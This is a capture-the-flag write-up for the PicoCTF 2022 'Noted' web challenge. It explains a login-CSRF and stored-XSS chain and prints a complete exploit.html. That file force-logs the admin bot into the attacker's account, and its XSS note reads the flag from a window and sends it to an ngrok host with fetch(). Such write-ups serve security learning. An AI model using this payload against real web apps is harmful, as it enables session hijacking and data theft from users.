Skip to content

PicoCTF 2022: Noted

TL;DR

  • The app allows users to create notes rendered as raw HTML.
  • Notes are viewed by an admin bot that is logged into an admin session.
  • No CSRF protection on the login endpoint.
  • Use a malicious HTML page to force the admin to log into your account.
  • Store an XSS payload in your notes that runs in the admin context.
  • When the admin views the notes, steal the flag via DOM access and exfiltration.

Video Walkthrough

PicoCTF 2022 Noted web exploitation video walkthrough showing CSRF login abuse and stored XSS flag exfiltration

Description

Web Challenge I made a nice web app that lets you take notes. I'm pretty sure I've followed all the best practices so its definitely secure right?

Solution

exploit.html

<body>
    <p>flag plz</p>
    <form action="http://0.0.0.0:8080/login" method="POST" id="loginForm">
        <input type="text" name="username" value="admin" />
        <input type="password" name="password" value="admin" />
        <input type="submit" value="Submit" />
    </form>
    <script>
        // Open notes in new window (containing the flag)
        window.open("http://0.0.0.0:8080/notes", "flagWindow");
        // Force admin to login to our account
        loginForm.submit();
        // When the admin arrives to our account, our XSS note will steal the flag:
        /* <script>let flagWindow = window.open('', 'flagWindow'); let flag = flagWindow.document.documentElement.innerText; fetch('http://3297-81-103-153-174.ngrok.io?flag=' + flag);<//script> */
    </script>
</body>